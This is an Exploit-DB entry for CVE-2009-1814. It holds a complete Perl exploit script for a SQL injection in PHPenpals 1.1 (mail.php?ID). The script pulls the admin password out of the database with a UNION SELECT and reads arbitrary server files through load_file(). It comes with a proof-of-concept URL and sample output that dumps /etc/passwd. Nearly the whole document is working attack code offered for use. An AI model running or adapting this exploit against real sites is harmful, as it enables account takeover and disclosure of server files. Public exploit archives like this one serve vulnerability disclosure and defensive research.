PHPenpals 1.1 - 'mail.php?ID' SQL Injection

EDB-ID:

8706

CVE:

2009-1814

EDB Verified:
Author:

Br0ly

Type:

webapps

Exploit: /
Platform:

PHP

Date:

2009-05-15

Vulnerable App:
#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Phpenpals
#| -Version: <= 1.1
#| -Site: http://sourceforge.net/projects/phpenpals/
#| -Download Script: http://sourceforge.net/project/showfiles.php?group_id=40166&package_id=32303&release_id=250717
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly.Code@gmail.com
#|
#| -Gretz: Osirys , xs86 , 6_Bl4ck9_f0x6 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -http://localhost/Scripts/phpenpals/mail.php?ID=-1+union+select+1,@@version--
#| -Vuls: @array = ('profile.php?personalID=' , 'mail.php?ID=')
#|   
#| - You just need pass of the admin for login in:
#| - http://localhost/Scripts/phpenpals/admin.php
#|
#| -Exploit: Demo:
#|------------------------------------------------------------------------------------------------------------------
#|
#| perl phpenpals.txt http://localhost/Scripts/phpenpals/ 1
#|
#|  --------------------------------------
#|   -Phpenpals                     
#|   -Sql Injection                      
#|   -by Br0ly                           
#|  --------------------------------------
#|
#|[+] Getting the pass of the admin.
#|[+] Password = admin
#|
#|perl phpenpals.txt http://localhost/Scripts/phpenpals/ 2
#|
#|  --------------------------------------
#|   -Phpenpals                     
#|   -Sql Injection                      
#|   -by Br0ly                           
#|  --------------------------------------
#|
#|[*] Cat:/etc/passwd
#|     
#|
#|root:x:0:0:root:/root:/bin/bash
#|daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#|bin:x:2:2:bin:/bin:/bin/sh
#|sys:x:3:3:sys:/dev:/bin/sh
#|sync:x:4:65534:sync:/bin:/bin/sync
#|games:x:5:60:games:/usr/games:/bin/sh
#|man:x:6:12:man:/var/cache/man:/bin/sh
#|lp:x:7:7:lp:/var/spool/lpd:/bin/sh
#|
#| ;D
#| And sorry for my bad english ;/
#|
 
  use IO::Socket::INET;
  use LWP::UserAgent;

  my $host      = $ARGV[0];
  my $opcao     = $ARGV[1];
  my $sql_path  = "/mail.php?ID=";
 
  if (@ARGV < 2) {
      &banner();
      &help("-1");
  }
 
  elsif(cheek($host,$opcao) == 1) {
      &banner();
      &xploit($host,$opcao,$sql_path);
  }
     
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {
      my $host     = $_[0];
      my $opcao    = $_[1];
      my $sql_path = $_[2];
      if($opcao == 1) { &adm_pass($host,$sql_path);  }
      if($opcao == 2) { &file_load($host,$sql_path); } 
  }

  sub adm_pass() {
     
      print "[+] Getting the pass of the admin.\n";
      my $host     = $_[0];
      my $spl_path = $_[1];
      my $sql_atk = $host.$spl_path."-1+union+select+1,concat(0x6272306c79,0x3a,password,0x3a,0x6272306c79)+from+admin--";
      my $re = get_url($sql_atk);
      if($re =~ /br0ly:(.+):br0ly/) {
    print "[+] Password = $1\n";
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);
     
      }
  }
 
  sub file_load() {
 
     my $host     = $_[0];
     my $spl_path = $_[1];
    
     print "[*] Cat:";
     my $file = <STDIN>;
     chomp($file);
     $file !~ /exit/ || die "[-] Quitting ..\n";
    
     if ($file !~ /\/(.*)/) {
    print "\n[-] Bad filename !\n";
    &file_load($host,$spl_path);
     }
    
     my $fencode = hex_str($file);
     my $byte = "0x";
     my $fl_atk = $host.$spl_path."-1+union+select+1,load_file(".$byte.$fencode.")--";
     my $re = get_url($fl_atk);
     my $content = tag($re);
         
     if ($content =~ /<table>\*\*<tr><td>(.+)<\/td><td><\/td><\/tr>/) {
    my $out = $1;
   
        $out =~ s/\$/ /g;
    $out =~ s/\*\*\*\*/ /g;
    $out =~ s/\*/\n/g;
    $out =~ s/Send/ /g;
    $out =~ s/email/ /g;
    $out =~ s/to/ /g;
        $out =~ s/$out/$out\n/ if ($out !~ /\n$/);
        print "$out";
    &file_load($host,$spl_path);

    if($out =~ ' ') {
      $c++;
      print "[-] Can't find ".$file." \n";
      if ( $c < 3 ) {
        print "[-] Exploit Fail\n\n";
        &file_load($host,$spl_path);
      }
   
      else { exit(0); }
   
    }
      }
  
  }   

  sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub hex_str () {
   
    my $str_1 = $_[0];
    my $str_hex = unpack('H*', "$str_1");
    return $str_hex;
   
  }

  sub cheek() {
    my $host  = $_[0];
    my $opcao = $_[1];
    if (($host =~ /http:\/\/(.*)/) && (($opcao == 1 || $opcao == 2))) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
   
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/phpenpals/ opcao \n";
    print "    Ex:     perl $0 http://localhost/phpenpals/ 1\n";
    print "[*] opcao 1 : adm pass\n";
    print "[*] opcao 2 : file_disc\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Phpenpals                       \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }

# milw0rm.com [2009-05-15]
Tags:
Advisory/Source: Link
Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services